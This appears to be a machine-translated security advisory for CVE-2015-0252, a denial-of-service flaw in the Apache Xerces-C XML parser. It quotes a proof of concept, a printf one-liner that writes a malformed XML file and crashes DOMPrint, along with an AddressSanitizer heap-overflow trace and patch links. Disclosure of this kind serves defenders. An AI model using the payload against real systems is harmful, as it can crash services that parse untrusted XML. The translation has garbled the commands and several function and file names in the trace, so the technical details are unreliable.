Apache Xerces-c xml Parser <3.1.2 DoS Vulnerability
Apache Xerces-c xml Parser <3.1.2 DoS Vulnerability
Release date:
Updated on:
Affected Systems:
Apache Group Xerces C++ < 3.1.2
Description:
CVE (CAN) ID: CVE-2015-0252
Xerces is an open-source XML document parsing project promoted by the Apache organization. It currently has multiple language versions, including JAVA, C ++, PERL, and COM.
In versions earlier than Apache Xerces-C 3.1.2, internal/XMLReader. cpp has a security vulnerability. Remote attackers can exploit XML data to cause DoS (segmentation errors and crashes ).
<* Source: vendor
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Vendor () provides the following test methods:
# Exploit Title: Apache Xerces-c xml Parser (<3.1.2) DoS POC
# Date: 2015-05-03
# Exploit Author: beford
# Vendorhomepage: http://xerces.apache.org/#xerces-c
# Version: Versions prior to 3.1.2
# Tested on: Ubuntu 15.04
# CVE: CVE-2015-0252
Apache Xerces-c xml Parser Crashes on Malformed Input
I believe this to be the same issue that was reported on CVE-2015-0252,
Posting this in case anyone is interested in reproducing it.
Original advisory:
Https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt
$ Printf "\ xff \ xfe \ x00 \ x00 \ x3c"> file. xml
$ DOMPrint./file. xml # Ubuntu 15.04 libxerces-c3.1 package
Segmentation fault
$./DOMPrint./file. xml # using Enabled build
========================================================== ======================================
= 6831 = ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c
At pc 0x836a721 bp 0xbf80000a8 sp 0xbf8000098
READ of size 1 at 0xb5d9d87c thread T0
#0 0x836a720 in xercesc_3_1: XMLReader: refreshRawBuffer ()
Xercesc/internal/XMLReader. cpp: 1719
#1 0x836a720 in xercesc_3_1: XMLReader: xcodeMoreChars (unsigned short *,
Unsigned char *, unsigned int) xercesc/internal/XMLReader. cpp: 1761
#2 0x837183f in xercesc_3_1: XMLReader: refreshCharBuffer ()
Xercesc/internal/XMLReader. cpp: 576
#3 0x837183f in xercesc_3_1: XMLReader: peekString (unsigned short
Const *) xercesc/internal/XMLReader. cpp: 1223
#4 0x83ad0ae in xercesc_3_1: ReaderMgr: peekString (unsigned short
Const *) xercesc/internal/ReaderMgr. hpp: 385
#5 0x83ad0ae in xercesc_3_1: xmlparser: checkXMLDecl (bool)
Xercesc/internal/xmlworkflow. cpp: 1608
#6 0x83b6469 in xercesc_3_1: xmllogs: scanProlog ()
Xercesc/internal/xmlworkflow. cpp: 1244
#7 0x8d69220 in
Xercesc_3_1: igxml1_:: scanDocument (xercesc_3_1: InputSource const &)
Xercesc/internal/igxmlworkflow. cpp: 206
#8 0x83cd3e7 in xercesc_3_1: xmldocument: scanDocument (unsigned short
Const *) xercesc/internal/xmlworkflow. cpp: 400
#9 0x83ce728 in xercesc_3_1: xmldocument: scanDocument (char const *)
Xercesc/internal/xmlworkflow. cpp: 408
#10 0x849afc5 in xercesc_3_1: AbstractDOMParser: parse (char const *)
Xercesc/parsers/AbstractDOMParser. cpp: 601
#11 0x8050bf2 in main src/DOMPrint. cpp: 398
#12 0xb6f5272d in _ libc_start_main
(/Lib/i386-linux-gnu/libc. so.6 + 0x1872d)
#13 0x805d3b5 (/ramdisk/DOMPrint + 0x805d3b5)
0xb5d9d87c is located 0 bytes to the right of 163964-byte region
[0xb5d75800, 0xb5d9d87c)
Allocated by thread T0 here:
#0 0xb72c3ae4 in operator new (unsigned int)
(/Usr/lib/i386-linux-gnu/libasan. so.1 + 0x51ae4)
#1 0x8340cce in xercesc_3_1: MemoryManagerImpl: allocate (unsigned int)
Xercesc/internal/MemoryManagerImpl. cpp: 40
#2 0x8094cb2 in xercesc_3_1: XMemory: operator new (unsigned int,
Xercesc_3_1: MemoryManager *) xercesc/util/XMemory. cpp: 68
#3 0x8daaaa7 in
Xercesc_3_1: igxml1_:: scanReset (xercesc_3_1: InputSource const &)
Xercesc/internal/IGXMLScanner2.cpp: 1284
#4 0x8d6912a in
Xercesc_3_1: igxml1_:: scanDocument (xercesc_3_1: InputSource const &)
Xercesc/internal/igxmlworkflow. cpp: 198
#5 0x83cd3e7 in xercesc_3_1: xmldocument: scanDocument (unsigned short
Const *) xercesc/internal/xmlworkflow. cpp: 400
#6 0x83ce728 in xercesc_3_1: xmldocument: scanDocument (char const *)
Xercesc/internal/xmlworkflow. cpp: 408
#7 0x849afc5 in xercesc_3_1: AbstractDOMParser: parse (char const *)
Xercesc/parsers/AbstractDOMParser. cpp: 601
#8 0x8050bf2 in main src/DOMPrint. cpp: 398
#9 0xb6f5272d in _ libc_start_main
(/Lib/i386-linux-gnu/libc. so.6 + 0x1872d)
SUMMARY: AddressSanitizer: heap-buffer-overflow
Xercesc/internal/XMLReader. cpp: 1719
Xercesc_3_1: XMLReader: refreshRawBuffer ()
Suggestion:
Vendor patch:
Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt
Http://svn.apache.org/viewvc? View = revision & revision = 1667870
This article permanently updates the link address: